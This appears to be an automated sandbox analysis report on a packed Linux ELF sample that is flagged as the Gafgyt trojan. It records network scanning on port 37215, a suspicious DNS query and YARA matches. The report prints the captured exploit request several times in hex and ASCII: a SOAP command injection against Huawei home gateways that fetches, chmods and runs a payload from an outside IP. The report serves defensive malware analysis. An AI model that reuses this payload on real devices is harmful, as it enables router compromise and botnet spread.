          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: /tmp/bVMuPnsMIq.elf (PID: 5644)Socket: 127.0.0.1:47845Jump to behavior
          Source: unknownTCP traffic detected without corresponding DNS query: 186.122.190.56
          Source: unknownTCP traffic detected without corresponding DNS query: 45.16.199.75
          Source: unknownTCP traffic detected without corresponding DNS query: 156.254.78.63
          Source: unknownTCP traffic detected without corresponding DNS query: 190.115.49.159
          Source: unknownTCP traffic detected without corresponding DNS query: 121.176.248.132
          Source: unknownTCP traffic detected without corresponding DNS query: 37.50.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 197.7.11.70
          Source: unknownTCP traffic detected without corresponding DNS query: 190.95.159.127
          Source: unknownTCP traffic detected without corresponding DNS query: 190.21.40.128
          Source: unknownTCP traffic detected without corresponding DNS query: 181.115.126.58
          Source: unknownTCP traffic detected without corresponding DNS query: 94.94.90.151
          Source: unknownTCP traffic detected without corresponding DNS query: 172.82.150.19
          Source: unknownTCP traffic detected without corresponding DNS query: 183.28.181.154
          Source: unknownTCP traffic detected without corresponding DNS query: 222.22.132.57
          Source: unknownTCP traffic detected without corresponding DNS query: 94.71.196.176
          Source: unknownTCP traffic detected without corresponding DNS query: 121.242.39.26
          Source: unknownTCP traffic detected without corresponding DNS query: 31.154.160.2
          Source: unknownTCP traffic detected without corresponding DNS query: 121.59.184.112
          Source: unknownTCP traffic detected without corresponding DNS query: 156.61.113.106
          Source: unknownTCP traffic detected without corresponding DNS query: 156.251.203.178
          Source: unknownTCP traffic detected without corresponding DNS query: 152.254.176.41
          Source: unknownTCP traffic detected without corresponding DNS query: 190.235.37.109
          Source: unknownTCP traffic detected without corresponding DNS query: 190.146.194.234
          Source: unknownTCP traffic detected without corresponding DNS query: 181.167.14.221
          Source: unknownTCP traffic detected without corresponding DNS query: 181.213.144.74
          Source: unknownTCP traffic detected without corresponding DNS query: 186.154.108.132
          Source: unknownTCP traffic detected without corresponding DNS query: 102.232.214.103
          Source: unknownTCP traffic detected without corresponding DNS query: 94.25.107.66
          Source: unknownTCP traffic detected without corresponding DNS query: 222.35.213.115
          Source: unknownTCP traffic detected without corresponding DNS query: 121.72.232.31
          Source: unknownTCP traffic detected without corresponding DNS query: 186.204.27.246
          Source: unknownTCP traffic detected without corresponding DNS query: 157.27.135.139
          Source: unknownTCP traffic detected without corresponding DNS query: 197.81.136.99
          Source: unknownTCP traffic detected without corresponding DNS query: 35.30.174.150
          Source: unknownTCP traffic detected without corresponding DNS query: 122.249.153.87
          Source: unknownTCP traffic detected without corresponding DNS query: 181.96.242.149
          Source: unknownTCP traffic detected without corresponding DNS query: 94.211.9.188
          Source: unknownTCP traffic detected without corresponding DNS query: 121.247.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 94.55.21.112
          Source: unknownTCP traffic detected without corresponding DNS query: 87.249.177.133
          Source: unknownTCP traffic detected without corresponding DNS query: 138.31.135.20
          Source: unknownTCP traffic detected without corresponding DNS query: 197.155.20.65
          Source: unknownTCP traffic detected without corresponding DNS query: 138.20.236.9
          Source: unknownTCP traffic detected without corresponding DNS query: 190.127.127.117
          Source: unknownTCP traffic detected without corresponding DNS query: 45.70.109.47
          Source: unknownTCP traffic detected without corresponding DNS query: 190.75.122.59
          Source: unknownTCP traffic detected without corresponding DNS query: 181.175.29.226
          Source: unknownTCP traffic detected without corresponding DNS query: 121.90.138.98
          Source: unknownTCP traffic detected without corresponding DNS query: 157.38.243.210
          Source: unknownTCP traffic detected without corresponding DNS query: 157.228.80.243
          Source: global trafficDNS traffic detected: DNS query: retardedclassmate.dyn
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: bVMuPnsMIq.elf, 5652.1.00007fec04017000.00007fec04036000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: bVMuPnsMIq.elf, 5652.1.00007fec04017000.00007fec04036000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: bVMuPnsMIq.elfString found in binary or memory: http://upx.sf.net

          System Summary

          barindex
          Source: 5652.1.00007fec04017000.00007fec04036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 5644.1.00007fec04017000.00007fec04036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: bVMuPnsMIq.elf PID: 5644, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: bVMuPnsMIq.elf PID: 5652, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: LOAD without section mappingsProgram segment: 0x8000
          Source: 5652.1.00007fec04017000.00007fec04036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 5644.1.00007fec04017000.00007fec04036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: bVMuPnsMIq.elf PID: 5644, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: bVMuPnsMIq.elf PID: 5652, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal92.troj.evad.linELF@0/0@41/0

          Data Obfuscation

          barindex
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 58962 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32962 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33356 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34060 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37096 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58566 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43904 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38270 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37634 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39820 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60668 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54852 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59460 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55664 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59550 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54546 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40034 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45840 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43966 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35680 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36006 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60442 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52268 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42190 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36224 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38592 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55434 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56064 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58562 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60212 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41996 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50494 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56438 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45172 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43904 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35062 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55834 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59682 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46648 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52012 -> 37215
